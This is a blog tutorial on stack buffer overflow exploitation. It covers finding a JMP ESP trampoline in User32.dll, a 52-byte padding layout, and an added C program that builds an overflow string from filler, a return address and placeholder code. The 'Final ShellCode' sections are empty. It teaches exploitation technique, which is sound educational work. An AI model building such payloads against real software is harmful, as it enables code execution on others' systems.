Source: Moeomu’s blog
Stack space shifting
The ShellCode's location in memory is often not fixed, so the return address cannot simply be overwritten with a hard-coded value. In other words, the stack address of the buffer array used in the previous article is not always the same. If the overwritten return address points to the wrong place, the CPU fetches whatever bytes happen to be there, may raise an invalid-instruction (or access-violation) exception, the program crashes, and the ShellCode never runs.
Principle
Find the address of a JMP ESP instruction in a system DLL that the process has already loaded, and overwrite the function's saved return address with that address. This locates the shellcode precisely and adapts to shifts in the stack address.
The stack grows from high addresses towards low ones, but both instruction execution and the overflowing write proceed from low addresses to high ones. Right after `retn` pops the overwritten return address, ESP points at the bytes immediately following that slot on the stack. The ShellCode is therefore addressed dynamically by filling everything before the return address with meaningless data and placing the start of the ShellCode right after it, at [ESP].
ShellCode writing
Structure
Useless data + JMP ESP address (positioned so that it lands exactly on the function's saved return address) + command code (for testing, a MessageBox popup)
Description
`retn` pops the overwritten return address and jumps to the JMP ESP instruction. The pop has already advanced ESP by 4, so ESP now points to the bytes immediately after the return-address slot, and JMP ESP lands exactly on the command code that follows.
Necessary data
- JMP ESP address: located in User32.dll at 0x77D29353 (it does not need to be an intended instruction in the disassembly; just search the binary for the byte sequence FF E4, which encodes JMP ESP). Note that this address is specific to the User32.dll build on the author's machine; on other builds, and on systems with ASLR, it has to be looked up again.
- Garbage data size: 52 bytes = buffer (44 bytes) + authenticated (4 bytes) + EBP (4 bytes)
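The two steps above, searching a loaded image for the FF E4 bytes and laying out padding + return address + command code, as an added C example (not code from the original post). The 52-byte layout and the 0x77D29353 address are taken from the article; the sample "DLL image" bytes and the two-byte placeholder command code are constructed here for illustration and are not a real MessageBox payload:

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Layout from the article: 44-byte buffer, 4-byte authenticated flag,
   4-byte saved EBP, then the saved return address. */
#define BUFFER_SIZE    44
#define FLAG_SIZE      4
#define SAVED_EBP_SIZE 4
#define PADDING_SIZE   (BUFFER_SIZE + FLAG_SIZE + SAVED_EBP_SIZE) /* 52 */

/* JMP ESP address the article found in User32.dll (build-specific, no ASLR). */
#define JMP_ESP_ADDR 0x77D29353u

/* Search an in-memory image for the bytes FF E4 (JMP ESP).
   Returns the offset of the first match, or -1 if none. The pair need not be
   an intended instruction; any FF E4 in executable memory works as a trampoline. */
long find_jmp_esp(const uint8_t *image, size_t len) {
    for (size_t i = 0; i + 1 < len; i++) {
        if (image[i] == 0xFF && image[i + 1] == 0xE4)
            return (long)i;
    }
    return -1;
}

/* Build the overflow string: padding + return address (little-endian, as it
   sits in memory) + command code. Returns total length, or 0 if out is too small. */
size_t build_payload(uint8_t *out, size_t out_cap, uint32_t ret_addr,
                     const uint8_t *code, size_t code_len) {
    size_t total = PADDING_SIZE + 4 + code_len;
    if (total > out_cap)
        return 0;
    memset(out, 0x90, PADDING_SIZE);                 /* meaningless filler (NOPs) */
    out[PADDING_SIZE + 0] = (uint8_t)(ret_addr);     /* overwrites saved return address */
    out[PADDING_SIZE + 1] = (uint8_t)(ret_addr >> 8);
    out[PADDING_SIZE + 2] = (uint8_t)(ret_addr >> 16);
    out[PADDING_SIZE + 3] = (uint8_t)(ret_addr >> 24);
    memcpy(out + PADDING_SIZE + 4, code, code_len);  /* this is what [ESP] points to */
    return total;
}

/* Constructed stand-in for a few bytes of a loaded DLL: push ebp; mov ebp,esp; FF E4; nop */
static const uint8_t sample_image[] = { 0x55, 0x8B, 0xEC, 0xFF, 0xE4, 0x90 };

/* Constructed placeholder command code: int3; ret (not a real MessageBox shellcode). */
static const uint8_t placeholder_code[] = { 0xCC, 0xC3 };

uint8_t g_payload[256];

/* Builds the demo payload into g_payload and returns its length. */
size_t demo_build(void) {
    return build_payload(g_payload, sizeof g_payload, JMP_ESP_ADDR,
                         placeholder_code, sizeof placeholder_code);
}

int main(void) {
    long off = find_jmp_esp(sample_image, sizeof sample_image);
    printf("FF E4 found at image offset %ld\n", off);

    size_t n = demo_build();
    for (size_t i = 0; i < n; i++)
        printf("%02X%s", g_payload[i], (i + 1) % 16 == 0 ? "\n" : " ");
    printf("\n");
    return 0;
}
```

The hex dump shows the return address at offset 52 as 53 93 D2 77, i.e. 0x77D29353 stored little-endian, immediately followed by the command code.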
Final Code
Here is the command code to be executed
Final ShellCode